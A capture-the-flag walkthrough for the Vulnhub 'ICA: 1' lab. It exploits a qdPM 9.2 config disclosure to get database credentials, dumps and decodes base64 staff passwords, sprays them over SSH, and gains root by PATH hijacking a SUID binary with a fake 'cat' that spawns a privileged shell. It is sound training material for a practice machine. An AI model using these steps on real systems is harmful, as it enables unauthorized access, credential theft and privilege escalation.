:: Introduction ::
Hey folks, here is a walkthrough of the “ICA: 1” machine on Vulnhub. The machine is categorized as easy, and according to me, it is very beginner-friendly.
The ICA: 1 Machine Link can be accessed from here. It includes the standard installation process for virtual machines.
After installing the instance, and booting up the machine, get the IP for the machine and let’s begin then.
:: Enumeration ::
The usual stuff! Perhaps the most burning procedure on any machine.
i) Network Enumeration
I use rustscan, to identify open TCP ports on any instance. Rustscan is comparatively faster than Nmap.
rustscan -a <Machine-IP> -- -A
The command is quite explanatory if you view the help menu for rustscan, but let me brief it for you, we are running rustscan on <Machine-IP> and running Nmap aggressive scan on top of it.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCXOd91pBvAeK0CKaRrhpY2TcbujCX4hxoP5/K/fZWGV6qn6HeOopROacEm9L9nHkGfhZyk5v9mA4FWBtPMjHUAfms8tgqDJ/IY4kQU5bnQH+gMpVA1ReJ7myaWzJTKeczWn20wzBW0Zl557PYA5ypNTOw66qgDU6vFxiQoVlbT8/kNRjvhvNuP33i1nhZhSsEZdiIznDfQlPp0ekkmqyNkhwsshFtwsYfSQOW2cpopcpvNGIG38s5FzJGrV3EYFLw4J3C5NhfSSueVhkV+LXCTmJecyxd7S/fsRimPSCR8O0z0aykN/Ts4Qmkrd2mAt8yOtLJ6pFlhTorWsAK7TXCG8xqGseE9LQdUeAk3UTrv3YPak/bdxnxH23pQy9PcNSW2bRKNpg2mKbYuQmpNyjwVaxKs2Jd3rwJwaQ0XT1wVPpi7AtLizDyrtCUpbrR/gFMUITxi0inZG54aNgS668y4ww9R98Rc1WzrwT2z6vzcev2KedzX0KkWJCp3Kdm9+jU=
| 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDdiFCHPlrpsgHUZ7TPuOfAk26vdS+LYia6jy6/b+3VF/PiWWxkpvaTyDIKOurj1sLje6IZLi+RCtpIzv5mI4uc=
| 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBJsiS3lTHIiHHiGGKretXMXZaFGQEkCOJMEYF2CgP0E
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: B0BD48E57FD398C5DA8AE8F2CCC8D90D
3306/tcp open mysql syn-ack ttl 64 MySQL 8.0.26
| mysql-info:
| Protocol: 10
| Version: 8.0.26
| Thread ID: 60
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, LongPassword, SupportsTransactions, InteractiveClient, SwitchToSSLAfterHandshake, ConnectWithDatabase, SupportsCompression, IgnoreSigpipes, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, FoundRows, DontAllowDatabaseTableColumn, LongColumnFlag, ODBCClient, Speaks41ProtocolOld, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: Y64jpfe}L=*\x0D\x0C\x11r"c`6w
|_ Auth Plugin Name: caching_sha2_password
33060/tcp open mysqlx syn-ack ttl 64 MySQL X protocol listener
22/TCP -- The usual SSH Port for connecting remotely to the machine.
80/TCP -- This is the port that is serving an HTTP Server using Apache/2.4.48
3306/TCP and 33060/TCP -- This port servers a MySQL 8.0.26 Server
From this stuff, we can clearly understand that the machine is running a web application and a MySQL database server, which could be potentially linked to the application. Though no directly exploitable vulnerabilities are there for those services, the only way we can use them is by brute-forcing credentials which is the last choice I prefer. So, let’s enumerate the web application and database server.
ii) Web Application Enumeration
By opening the <machine-ip> in the browser, we can see Apache is serving an application called as “qdPM 9.2”. Seems interesting, and then I learned about the qdPM application, and to my insights qdPM is a Web Based Project Management tool.
I researched and tried for default credentials for this application but it didn’t work, then after some research, I found an exploit, that helped us to get the database credentials for this application that were too unauthenticated.
After analysing the Exploit Link I concluded that by sending a request for /core/config/databases.yml we can get the database credentials. Easy Stuff! Haha! :)
I tried, and boom I got the database password for qdPM!
Here you go with the database credentials qdpmadmin:UcVQCMQk2STVeS6J
I tried using this as a qdPM Password, but the authentication failed. Aah!, we also got port 3306 open, why not authenticate to it?
iii) Database Enumeration
To authenticate to the database we can use the built-in mariadb client in Kali Linux.
mariadb -h <Machine-IP> -u qdpmadmin -p'UcVQCMQk2STVeS6J' --ssl=0
In this command, -h specifies the host IP address, -u for username and -p for password. We are also using --ssl=0 to disable SSL-based authentication.
After getting authenticated to the database we can dump the databases present.
For this, let’s see what databases are there in the server using SQL Query.
MySQL [(none)]> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| qdpm |
| staff |
| sys |
+--------------------+
6 rows in set (0.018 sec)
We see two databases, which will be helpful to us, the staff and qdPM. Let’s start enumerating the staff DB first.
MySQL [(none)]> use staff;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [staff]> SHOW TABLES;
+-----------------+
| Tables_in_staff |
+-----------------+
| department |
| login |
| user |
+-----------------+
3 rows in set (0.004 sec)
MySQL [staff]> select * from user;
+------+---------------+--------+---------------------------+
| id | department_id | name | role |
+------+---------------+--------+---------------------------+
| 1 | 1 | Smith | Cyber Security Specialist |
| 2 | 2 | Lucas | Computer Engineer |
| 3 | 1 | Travis | Intelligence Specialist |
| 4 | 1 | Dexter | Cyber Security Analyst |
| 5 | 2 | Meyer | Genetic Engineer |
+------+---------------+--------+---------------------------+
5 rows in set (0.002 sec)
MySQL [staff]> select * from login;
+------+---------+--------------------------+
| id | user_id | password |
+------+---------+--------------------------+
| 1 | 2 | c3VSSkFkR3dMcDhkeTNyRg== |
| 2 | 4 | N1p3VjRxdGc0MmNtVVhHWA== |
| 3 | 1 | WDdNUWtQM1cyOWZld0hkQw== |
| 4 | 3 | REpjZVZ5OThXMjhZN3dMZw== |
| 5 | 5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+
5 rows in set (0.002 sec)
MySQL [staff]> select * from department;
+------+----------+
| id | name |
+------+----------+
| 1 | Agent |
| 2 | Engineer |
+------+----------+
As you can see, we have got some passwords, yeah! but they are base64 encoded.
I guess, the developers didn’t know base64 is not an encryption algorithm, we decoded those passwords using echo “<password>” | base64 -d . After decoding them, I mapped them to their correct username, and we got this table
| Username | Password |
| Lucas | suRJAdGwLp8dy3rF |
| Dexter | 7ZwV4qtg42cmUXGX |
| Smith | X7MQkP3W29fewHdC |
| Travis | DJceVy98W28Y7wLg |
| Meyer | cqNnBWCByS2DuJSy |
After this, I got on the qdPM database but didn’t find anything interesting except these credentials.
admin@localhost.com: $P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0
The password is hashed, I tried to crack it using John using the rockyou.txt wordlist but failed to find a password.
Let’s try to spray those passwords on SSH to get a remote shell.
:: Exploitation ::
Since we have those credentials, I found that the usernames “dexter” and “travis” with their corresponding passwords, can get us an SSH on the machine.
Easy Stuff!, We got the SSH
From the Travis home, we got the user flag located at /home/travis/user.txt
ICA{Secret_Project}
From the dexter home, we got a note, (note.txt)
It seems to me that there is a weakness while accessing the system. As far as I know, the contents of executable files are partially viewable. I need to find out if there is a vulnerability or not.
:: Spawning root :) (Privilege Escalation) ::
We pwned the user’s on this machine but what about root?
I tried running linpeas.sh on this machine, to help me with Privilege Escalation but that didn’t give any satisfactory output.
I found a weird SUID Binary in the /opt directory.
After running the get_access binary we get the following output,
This is an ELF 64-bit executable, let’s do some reverse engineering stuff. I got Ghidra opened, loaded this binary and checked the main function.
We can analyse that it sets a uid and gid bit, and then print the output of /root/system.info
Since the path for cat binary (which is a built-in binary to print the contents of a file) is not fully specified, we can do PATH Hijacking.
We will create another binary name cat, with malicious content, which will get executed since it will find the binary in our path.
i) Assembling the bomb
So, let’s create our malicious cat binary. What we did is that we asked to spawn a bash shell, save it in the file name cat, and give executable permissions to cat.
echo -e '#!/bin/bash\n/bin/bash -p' > cat
chmod +x cat
ii) Deploying the bomb
We will create a directory inside the tmp folder, named exploit. Then we will move our cat binary to the exploit directory. After this, we will add /tmp/exploit to the PATH variable so that whenever the system searches for cat binary, it hops to /tmp/exploit/cat.
Great shit!
mkdir /tmp/exploit
mv cat /tmp/exploit/
export PATH="/tmp/exploit:$PATH"
iii) Tick Tick Booom!
Let’s trigger the bomb and pwn root!
Yes! we got root!…
We successfully pwned the ICA :1 Lab, Hope so ICA Administrators are on sleep :) since we got them!
Let’s get the root.txt flag located at /root/root.txt
ICA{Next_Generation_Self_Renewable_Genetics}
:: Summary ::
We exploited a vulnerability in the qdPM 9.2 Application to get the database credentials. Utilizing them to access the database, dumping the staff passwords which were base64 encoded. Then authenticating to the server using SSH and those dumped credentials to get the user flag. Then abusing SUID Permissions, in the get_access binary by using PATH Hijacking and then getting the root shell.
Hope so this write-up is helpful to you!
In case you are still stuck, do PM me on Sanchit's Linkedin.
Credits for the machine @onurturali